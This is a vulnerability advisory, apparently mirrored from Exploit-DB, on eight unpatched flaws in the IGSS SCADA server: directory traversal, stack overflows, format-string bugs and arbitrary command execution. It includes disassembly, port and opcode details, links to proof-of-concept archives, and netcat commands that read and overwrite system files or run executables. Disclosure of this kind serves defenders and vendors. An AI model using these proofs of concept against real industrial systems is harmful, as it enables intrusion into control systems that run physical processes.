Sources: http://aluigi.org/adv/igss_1-adv.txt http://aluigi.org/adv/igss_2-adv.txt http://aluigi.org/adv/igss_3-adv.txt http://aluigi.org/adv/igss_4-adv.txt http://aluigi.org/adv/igss_5-adv.txt http://aluigi.org/adv/igss_6-adv.txt http://aluigi.org/adv/igss_7-adv.txt http://aluigi.org/adv/igss_8-adv.txt
Advisory Archive: http://www.exploit-db.com/sploits/igss_adv.tar.gz PoC Archive: http://www.exploit-db.com/sploits/igss_poc.tar.gz
#######################################################################
Luigi Auriemma
Application: IGSS (Interactive Graphical SCADA System) http://www.igss.com http://www.7t.dk Versions: IGSSdataServer.exe <= 9.00.00.11063 Platforms: Windows Date: 21 Mar 2011 (found 10 Jan 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org
#######################################################################
=============== Introduction ===============
IGSS (Interactive Graphical SCADA system) is a SCADA solution developed by the 7-Technologies and used mainly in Denmark and US.
Informations from the vendor's website: "IGSS is the complete automation software – a SCADA system for process control and supervision - with a long row of releases since the start of 7T 25 years ago. At that time, 7T was the first company in the world to develop an object oriented and mouse operated SCADA system under the name of IGSS."
#######################################################################
Directory Traversal:
====== Bug ======
IGSSdataServer.exe is a server running on port 12401 active when the project is started.
The opcode 0xd is used for the file operations that cover creation, reading, writing, deleting, renaming and so on.
The server is affected by a directory traversal that gives the attacker the possibility of downloading (command 0x3) or uploading and overwriting (0x2) any file on the disk where the software is installed.
#######################################################################
=========== The Code ===========
http://aluigi.org/poc/igss_1.zip http://www.exploit-db.com/sploits/igss_1.zip
example for downloading c:\boot.ini: nc SERVER 12401 < igss_1a.dat
example for writing/overwriting the file c:\evil.bat nc SERVER 12401 < igss_1b.dat
#######################################################################
Remote Stack Overflow:
====== Bug ======
IGSSdataServer.exe is a server running on port 12401 active when the project is started.
The opcode 0xd is used for the file operations that cover creation, reading, writing, deleting, renaming and so on.
All the commands supported by this opcode except "FileReserve" (0x7) are affected by different buffer overflow vulnerabilities caused by the copying of the filename provided by the client in stack buffers of 256 bytes.
The following is the list of the copying functions for each command (I don't remember the exact version from which I got them):
"ListAll" (0x1) 00406e91 "Write File" (0x2) 004071dd "ReadFile" (0x3) 004072fd "Delete" (0x4) 00406fad "RenameFile" (0x5) 00407094 and 004070cf "FileInfo" (0x6) 0040746f
#######################################################################
=========== The Code ===========
http://aluigi.org/poc/igss_2.zip http://www.exploit-db.com/sploits/igss_2.zip
nc SERVER 12401 < igss_2a.dat nc SERVER 12401 < igss_2b.dat nc SERVER 12401 < igss_2c.dat nc SERVER 12401 < igss_2d.dat nc SERVER 12401 < igss_2e.dat nc SERVER 12401 < igss_2f.dat
#######################################################################
Remote Stack Overflow:
====== Bug ======
IGSSdataServer.exe is a server running on port 12401 active when the project is started.
The opcode 0x7 is used for handling the RMS report templates and through the "Add" command (0x4) is possible to exploit some buffer overflows caused by the copying of the client strings in small stack buffers:
00409B4F . 8D46 04 LEA EAX,DWORD PTR DS:[ESI+4] ; string from offset 0x16 of the packet 00409B52 . 8D5424 1A LEA EDX,DWORD PTR SS:[ESP+1A] 00409B56 . 83C4 0C ADD ESP,0C 00409B59 . 2BD0 SUB EDX,EAX 00409B5B . EB 03 JMP SHORT 00409B60 00409B5D 8D49 00 LEA ECX,DWORD PTR DS:[ECX] 00409B60 > 8A08 MOV CL,BYTE PTR DS:[EAX] 00409B62 . 880C02 MOV BYTE PTR DS:[EDX+EAX],CL 00409B65 . 40 INC EAX 00409B66 . 84C9 TEST CL,CL 00409B68 .^ 75 F6 JNZ SHORT 00409B60 00409B6A . 8A46 71 MOV AL,BYTE PTR DS:[ESI+71] 00409B6D . 884424 0D MOV BYTE PTR SS:[ESP+D],AL 00409B71 . 8D46 2C LEA EAX,DWORD PTR DS:[ESI+2C] ; from offset 0x3e 00409B74 . 8D5424 36 LEA EDX,DWORD PTR SS:[ESP+36] 00409B78 . 2BD0 SUB EDX,EAX 00409B7A . 8D9B 00000000 LEA EBX,DWORD PTR DS:[EBX] 00409B80 > 8A08 MOV CL,BYTE PTR DS:[EAX] 00409B82 . 880C02 MOV BYTE PTR DS:[EDX+EAX],CL 00409B85 . 40 INC EAX 00409B86 . 84C9 TEST CL,CL 00409B88 .^ 75 F6 JNZ SHORT 00409B80 00409B8A . 8D46 6C LEA EAX,DWORD PTR DS:[ESI+6C] ; from offset 0x7e 00409B8D . 8D5424 76 LEA EDX,DWORD PTR SS:[ESP+76] 00409B91 . 2BD0 SUB EDX,EAX 00409B93 > 8A08 MOV CL,BYTE PTR DS:[EAX] 00409B95 . 880C02 MOV BYTE PTR DS:[EDX+EAX],CL 00409B98 . 40 INC EAX 00409B99 . 84C9 TEST CL,CL 00409B9B .^ 75 F6 JNZ SHORT 00409B93
#######################################################################
=========== The Code ===========
http://aluigi.org/poc/igss_3.zip http://www.exploit-db.com/sploits/igss_3.zip
nc SERVER 12401 < igss_3.dat
#######################################################################
Remote Stack Overflow:
====== Bug ======
IGSSdataServer.exe is a server running on port 12401 active when the project is started.
The opcode 0x7 is used for handling the RMS report templates and through the "ReadFile" (0x6) and "Write File" (0x5) commands is possible to exploit a buffer overflow caused by the building of a full path string using a stack buffer of 256 bytes located on the caller function:
0040F840 /$ 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4] 0040F844 |. 50 PUSH EAX 0040F845 |. 83C1 04 ADD ECX,4 0040F848 |. 51 PUSH ECX 0040F849 |. 8B4C24 10 MOV ECX,DWORD PTR SS:[ESP+10] 0040F84D |. 68 54A54300 PUSH 0043A554 ; "%s\%s.RMS" 0040F852 |. 51 PUSH ECX 0040F853 |. E8 120F0100 CALL 0042076A ; sprintf 0040F858 |. 83C4 10 ADD ESP,10 0040F85B \. C2 0800 RETN 8
#######################################################################
=========== The Code ===========
http://aluigi.org/poc/igss_4.zip http://www.exploit-db.com/sploits/igss_4.zip
Proof-of-concept via "ReadFile": nc SERVER 12401 < igss_4a.dat
Proof-of-concept via "Write File": nc SERVER 12401 < igss_4b.dat
#######################################################################
Remote Stack Overflow:
====== Bug ======
IGSSdataServer.exe is a server running on port 12401 active when the project is started.
The opcode 0x7 is used for handling the RMS report templates and after the parsing of the "Rename" (0x2), "Delete" (0x3) and "Add" (0x4) commands it's called the function 0040F910 that builds the string to place in RMS.DIC and that is vulnerable to a buffer overflow on a stack buffer of about 512 bytes:
0040F9FE |. 8D0432 |LEA EAX,DWORD PTR DS:[EDX+ESI] 0040FA01 |. 8D48 6A |LEA ECX,DWORD PTR DS:[EAX+6A] 0040FA04 |. 51 |PUSH ECX 0040FA05 |. 8D50 2A |LEA EDX,DWORD PTR DS:[EAX+2A] 0040FA08 |. 52 |PUSH EDX 0040FA09 |. 0FB650 01 |MOVZX EDX,BYTE PTR DS:[EAX+1] 0040FA0D |. 8D48 02 |LEA ECX,DWORD PTR DS:[EAX+2] 0040FA10 |. 51 |PUSH ECX 0040FA11 |. 52 |PUSH EDX 0040FA12 |. 8D8424 24020000 |LEA EAX,DWORD PTR SS:[ESP+224] 0040FA19 |. 68 E0A54300 |PUSH 0043A5E0 ; "%d,%s,%s,%s" 0040FA1E |. 50 |PUSH EAX 0040FA1F |. E8 460D0100 |CALL 0042076A ; sprintf
#######################################################################
=========== The Code ===========
The following proof-of-concept exploits the vulnerability from the "Rename" command, mainly because it's the only command not affected by other vulnerabilities before the reaching of this bugged function:
http://aluigi.org/poc/igss_5.zip http://www.exploit-db.com/sploits/igss_5.zip
nc SERVER 12401 < igss_5a.dat (will add the "old_name" template) nc SERVER 12401 < igss_5b.dat
#######################################################################
Remote Format String:
====== Bug ======
IGSSdataServer.exe is a server running on port 12401 active when the project is started.
The logging function Shmemmgr.logText that places messages in GSST.LOG has a printf-like prototype but the function 0040cec0 that handles all the internal logs doesn't provide the necessary format argument when calls it:
0040CF5B |> 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] 0040CF5F |. 50 PUSH EAX 0040CF60 |. 57 PUSH EDI 0040CF61 |. 6A 0D PUSH 0D 0040CF63 |. 6A 01 PUSH 1 0040CF65 |. FF15 6C834300 CALL DWORD PTR DS:[<&Shmemmgr9.logText>] ; Shmemmgr.logText ... 005A55E6 . 8B4D EC MOV ECX,DWORD PTR SS:[EBP-14] 005A55E9 . 51 PUSH ECX 005A55EA . 8B55 14 MOV EDX,DWORD PTR SS:[EBP+14] 005A55ED . 52 PUSH EDX 005A55EE . 68 00280000 PUSH 2800 005A55F3 . 8D85 E8D7FFFF LEA EAX,DWORD PTR SS:[EBP-2818] 005A55F9 . 50 PUSH EAX 005A55FA . FF15 20026200 CALL DWORD PTR DS:[<&MSVCR90.vsprintf_s>] ; MSVCR90.vsprintf_s
Note that is not clear if this vulnerability is exploitable for code execution.
#######################################################################
=========== The Code ===========
http://aluigi.org/poc/igss_6.zip http://www.exploit-db.com/sploits/igss_6.zip
nc SERVER 12401 < igss_6.dat
#######################################################################
Remote Stack Overflow:
====== Bug ======
IGSSdataServer.exe is a server running on port 12401 active when the project is started.
The opcode 0x8 is used for handling the STDREP requests and through the command 0x4 is possible to exploit a buffer overflow caused by the building of a SQL query using a stack buffer of 256 bytes:
0040A4B5 . 8B46 04 MOV EAX,DWORD PTR DS:[ESI+4] 0040A4B8 . 8B48 16 MOV ECX,DWORD PTR DS:[EAX+16] 0040A4BB . 51 PUSH ECX 0040A4BC . 83C0 1A ADD EAX,1A 0040A4BF . 50 PUSH EAX 0040A4C0 . 68 7C984300 PUSH 0043987C ; "UPDATE ReportFormats SET RMSref={%s} WHERE (FormatID=%d)" 0040A4C5 . 8BD7 MOV EDX,EDI 0040A4C7 . 52 PUSH EDX 0040A4C8 . E8 9D620100 CALL 0042076A ; sprintf
Note that is not clear if this vulnerability is exploitable for code execution.
#######################################################################
=========== The Code ===========
http://aluigi.org/poc/igss_7.zip http://www.exploit-db.com/sploits/igss_7.zip
nc SERVER 12401 < igss_7.dat
#######################################################################
Arbitrary Command Execution:
====== Bug ======
dc.exe is a server running on port 12397 active when the project is started.
The opcodes 0xa and 0x17 are used for launching the executables located in the folder of the software but through directory traversal is possible to execute any arbitrary executable on the disk where is located the software and specifying any argument for its execution.
#######################################################################
=========== The Code ===========
http://aluigi.org/poc/igss_8.zip http://www.exploit-db.com/sploits/igss_8.zip
Two examples for executing calc.exe ("calc.exe arg1 arg2 arg3"): nc SERVER 12397 < igss_8a.dat nc SERVER 12397 < igss_8b.dat
#######################################################################
====== 4) Fix ======
No fix.
#######################################################################
|